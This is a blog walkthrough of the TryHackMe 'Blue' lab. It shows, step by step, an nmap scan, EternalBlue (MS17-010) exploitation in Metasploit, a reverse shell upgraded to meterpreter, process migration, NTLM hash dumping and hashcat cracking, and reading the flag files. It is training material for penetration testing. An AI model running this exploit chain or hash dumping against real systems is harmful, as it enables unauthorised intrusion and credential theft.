TryHackMe - Blue

Prerequisite

$ export IP=THM_VPN_IP

TASK 1 - RECON

1. Scan the machine

The command below kicks off the nmap scan into a portScan dir output = all formats.

$ sudo nmap -sC -sV -vvv -oA ./portScan/nmap-initial $IP
Nmap scan report for 10.10.0.135
Host is up, received echo-reply ttl 127 (0.050s latency).
Scanned at 2020-04-12 12:48:35 BST for 137s
Not shown: 991 closed ports
Reason: 991 resets
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped   syn-ack ttl 127
|_ssl-date: 2020-04-12T11:49:53+00:00; +1s from scanner time.
49152/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49159/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h15m01s, deviation: 2h30m00s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:09:52:93:bf:3a (unknown)
| Names:
|   JON-PC<00>           Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   JON-PC<20>           Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   02 09 52 93 bf 3a 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 62444/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 34185/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 22744/udp): CLEAN (Timeout)
|   Check 4 (port 44981/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-04-12T06:49:38-05:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-12T11:49:38
|_  start_date: 2020-04-12T09:42:45
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 12:50:52 2020 -- 1 IP address (1 host up) scanned in 137.96 seconds

2. How many ports are open with a port number under 1000?

135/tcp
139/tcp
445/tcp

The correct answer for this question was 3.

3. What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

As this machine is call Blue, it was safe to assume the answer would be eternal blue which is:

ms-17-010

TASK 2 -GAIN ACCESS

1. Start Metasploit

$ sudo msfdb run

2. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........).

Within metasploit we search for eternal blue to identify all the matching modules.

msf5 > search eternalblue
Matching Modules
================
   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

As can be see from above there are 4No. exploits (#2-5).

The correct answer for this question was #2.

exploit/windows/smb/ms17_010_eternalblue

3. Show options and set the one required value. What is the name of this value? (All caps for submission). Following on from the above command we can determine the answer.

msf5 > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) >

The answer appears to be RHOSTS, however, when entering this into the submission box it was incorrect. The answer they were looking for was RHOST, maybe this was just a glitch in the matrix??

4. Run the exploit.

Before running the exploit we need to set our LHOST and LPORT.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS  THM_VPN_IP
RHOSTS => THM_VPN_IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444

Carrying on our command workflow we attempt to exploit the machine.

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on THM_VPN_IP:4444
[*] THM_VPN_IP:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] THM_VPN_IP:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] THM_VPN_IP:445      - Scanned 1 of 1 hosts (100% complete)
[*] THM_VPN_IP:445 - Connecting to target for exploitation.
[+] THM_VPN_IP:445 - Connection established for exploitation.
[+] THM_VPN_IP:445 - Target OS selected valid for OS indicated by SMB reply
[*] THM_VPN_IP:445 - CORE raw buffer dump (42 bytes)
[*] THM_VPN_IP:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] THM_VPN_IP:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] THM_VPN_IP:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] THM_VPN_IP:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] THM_VPN_IP:445 - Trying exploit with 12 Groom Allocations.
[*] THM_VPN_IP:445 - Sending all but last fragment of exploit packet
[*] THM_VPN_IP:445 - Starting non-paged pool grooming
[+] THM_VPN_IP:445 - Sending SMBv2 buffers
[+] THM_VPN_IP:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] THM_VPN_IP:445 - Sending final SMBv2 buffers.
[*] THM_VPN_IP:445 - Sending last fragment of exploit packet!
[*] THM_VPN_IP:445 - Receiving response from exploit packet
[+] THM_VPN_IP:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] THM_VPN_IP:445 - Sending egg to corrupted connection.
[*] THM_VPN_IP:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (THM_VPN_IP:4444 -> 10.1.0.135:49175) at 2020-04-12 13:50:08 +0100
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32>^Z
Background session 1? [y/N]  y

5. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

The exploit came through blank, however, by pressing RETURN we can now see the DOS prompt of the exploited machine indicated above.

TASK 3 - ESCALATION

1. If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected).

C:\Windows\system32>^Z
Background session 1? [y/N]  y

msf5 > grep meterpreter search shell
   273  payload/android/meterpreter_reverse_http                                            normal     No     Android Meterpreter Shell, Reverse HTTP Inline
   274  payload/android/meterpreter_reverse_https                                           normal     No     Android Meterpreter Shell, Reverse HTTPS Inline
   275  payload/android/meterpreter_reverse_tcp                                             normal     No     Android Meterpreter Shell, Reverse TCP Inline
   439  payload/osx/x64/meterpreter/bind_tcp                                                normal     No     OSX Meterpreter, Bind TCP Stager
   440  payload/osx/x64/meterpreter/reverse_tcp                                             normal     No     OSX Meterpreter, Reverse TCP Stager
   459  payload/python/meterpreter_bind_tcp                                                 normal     No     Python Meterpreter Shell, Bind TCP Inline
   460  payload/python/meterpreter_reverse_http                                             normal     No     Python Meterpreter Shell, Reverse HTTP Inline
   461  payload/python/meterpreter_reverse_https                                            normal     No     Python Meterpreter Shell, Reverse HTTPS Inline
   462  payload/python/meterpreter_reverse_tcp                                              normal     No     Python Meterpreter Shell, Reverse TCP Inline
   482  payload/windows/meterpreter/bind_hidden_ipknock_tcp                                 normal     No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   483  payload/windows/meterpreter/bind_hidden_tcp                                         normal     No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   484  payload/windows/meterpreter_bind_named_pipe                                         normal     No     Windows Meterpreter Shell, Bind Named Pipe Inline
   485  payload/windows/meterpreter_bind_tcp                                                normal     No     Windows Meterpreter Shell, Bind TCP Inline
   486  payload/windows/meterpreter_reverse_http                                            normal     No     Windows Meterpreter Shell, Reverse HTTP Inline
   487  payload/windows/meterpreter_reverse_https                                           normal     No     Windows Meterpreter Shell, Reverse HTTPS Inline
   488  payload/windows/meterpreter_reverse_ipv6_tcp                                        normal     No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
   489  payload/windows/meterpreter_reverse_tcp                                             normal     No     Windows Meterpreter Shell, Reverse TCP Inline
   492  payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp                          normal     No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   493  payload/windows/patchupmeterpreter/bind_hidden_tcp                                  normal     No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   524  payload/windows/x64/meterpreter_bind_named_pipe                                     normal     No     Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   525  payload/windows/x64/meterpreter_bind_tcp                                            normal     No     Windows Meterpreter Shell, Bind TCP Inline (x64)
   526  payload/windows/x64/meterpreter_reverse_http                                        normal     No     Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   527  payload/windows/x64/meterpreter_reverse_https                                       normal     No     Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   528  payload/windows/x64/meterpreter_reverse_ipv6_tcp                                    normal     No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   529  payload/windows/x64/meterpreter_reverse_tcp                                         normal     No     Windows Meterpreter Shell, Reverse TCP Inline x64
   566  post/multi/manage/shell_to_meterpreter                                              normal     No     Shell to Meterpreter Upgrade
msf5 >

The module required to upgrade a standard shell to a meterpreter session is post/multi/manage/shell_to_meterpreter

2. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer).

Carrying on our command workflow we select the correct module and list the options.

msf5 > use 566
msf5 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) >

The options required for this module to function is SESSION.

3. Set the required option, you may need to list all of the sessions to find your target here.

msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.10.55.106:49175 (10.10.55.106)

msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1

SESSION => 1

4. Run! If this doesn't work, try completing the exploit from the previous task once more.

msf5 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on THM_VPN_IP:4433
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (180291 bytes) to THM_VPN_IP
[*] Meterpreter session 2 opened (THM_VPN_IP:4433 -> 10.1.0.135:49171) at 2020-04-12 14:52:56 +0100
[*] Stopping exploit/multi/handler

msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.27.96)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      THM_VPN_IP:4433 -> 10.1.0.135:49171 (10.10.27.96)

5. Once the meterpreter shell conversion completes, select that session for use.

msf5 post(multi/manage/shell_to_meterpreter) > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S <opt>  Row search filter.
    -c <opt>  Run a command on the session given with -i, or all
    -d        List all inactive sessions
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -n <opt>  Name or rename a session by ID
    -q        Quiet mode
    -s <opt>  Run a script or module on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List all active sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

msf5 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.81.119)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      THM_VPN_IP:4433 -> 10.1.0.135:49172 (10.10.81.119)

msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >

6. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 1120 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

7. List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

C:\Windows\system32>^Z
Background channel 1? [y/N]  y
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 444   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 556   548   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 604   548   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 616   596   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 656   596   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 704   604   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 712   604   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 720   604   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 772   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 828   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 896   704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 944   704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1012  656   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 1076  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1120  2520  cmd.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\cmd.exe
 1156  704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1292  704   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1336  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1388  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 1412  704   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1476  704   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
 1596  704   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 1612  704   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1724  772   WMIADAP.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WMIADAP.exe
 1936  704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 2044  1292  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 2056  772   taskeng.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\taskeng.exe
 2060  828   WmiPrvSE.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiPrvSE.exe
 2068  828   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 2160  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2392  2384  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 2520  2392  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
 2600  704   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 2640  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2760  704   mscorsvw.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
 2784  704   mscorsvw.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 2820  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2852  704   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 2892  704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2952  704   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe

meterpreter >

8. Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

meterpreter > migrate 2892
[*] Migrating from 2520 to 2892...
[*] Migration completed successfully.
meterpreter >

TASK 4 - CRACKING

1. Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >

2. Copy this password hash to a file and research how to crack it. What is the cracked password?

We first need to clean up the hash to match how hashcat wants to receive the hash, examples of the hashes can be found here. Basically, we need to remove everything apart from the last part of the hash, ensuring to remove every : too.

Original - HASH

Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Hashcat - HASH

ffb43f0de35be4d9917ac0cc8ad57f8d

To confirm the hash is correct we can use hashid, note we are feeding in the modified hash which is saved in a file (ntlm.txt).

> hashid -m < ntlm.txt
Analyzing 'ffb43f0de35be4d9917ac0cc8ad57f8d'
[+] MD2
[+] MD5 [Hashcat Mode: 0]
[+] MD4 [Hashcat Mode: 900]
[+] Double MD5 [Hashcat Mode: 2600]
[+] LM [Hashcat Mode: 3000]
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5 [Hashcat Mode: 8600]
[+] Skype [Hashcat Mode: 23]
[+] Snefru-128
[+] NTLM [Hashcat Mode: 1000]
[+] Domain Cached Credentials [Hashcat Mode: 1100]
[+] Domain Cached Credentials 2 [Hashcat Mode: 2100]
[+] DNSSEC(NSEC3) [Hashcat Mode: 8300]
[+] RAdmin v2.x [Hashcat Mode: 9900]
> 

The hash appears to be correct and using the -m switch of hashid also shows the mode we need to use for hashcat, 1000.

Below is the hashcat command, where using the backticks we can run a command to feed into the hashcat command; furthermore, we are using rockyou.txt as our wordlist.

--force - hashcat used in a VM
-a - indicated wordlist mode
-o - outputs the cracked passwords to a file called cracked.txt.

> hashcat -m 1000 -a 0 `cat ntlm.txt` /usr/share/wordlists/rockyou.txt --force -o cracked.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel Core Processor (Skylake, IBRS), 2048/5918 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'
* Device #1: Kernel m01000_a0-pure.ad7daebd.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
### * Runtime...: 2 secs

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: ffb43f0de35be4d9917ac0cc8ad57f8d
Time.Started.....: Sun Apr 12 15:34:56 2020 (4 secs)
Time.Estimated...: Sun Apr 12 15:35:00 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2885.2 kH/s (0.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10203136/14344385 (71.13%)
Rejected.........: 0/10203136 (0.00%)
Restore.Point....: 10199040/14344385 (71.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alsinah -> alonsouriel

Started: Sun Apr 12 15:34:46 2020
Stopped: Sun Apr 12 15:35:01 2020
> cat cracked.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:PASSWORDHERE
>

TASK 5 - FIND FLAGS!

1. Flag1? (Only submit the flag contents {CONTENTS})

We can use meterpreter to search for the flag files.

meterpreter > search -f flag*
Found 6 results...
    c:\flag1.txt (24 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk (482 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk (848 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk (2344 bytes)
    c:\Users\Jon\Documents\flag3.txt (37 bytes)
    c:\Windows\System32\config\flag2.txt (34 bytes)
meterpreter >

We can see above that all three flag files are found; we just need to read them now.

c:\>more flag1.txt
more flag1.txt
flag{FLAG1}

2. Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare,however, it can happen.

c:\Windows\System32\config>more flag2.txt
more flag2.txt
flag{FLAG2}

3. Flag3?

C:\Users\Jon\Documents>more flag3.txt
more flag3.txt
flag{FLAG3}

You'll only receive email when BreakBeforeMake publishes a new post

More from BreakBeforeMake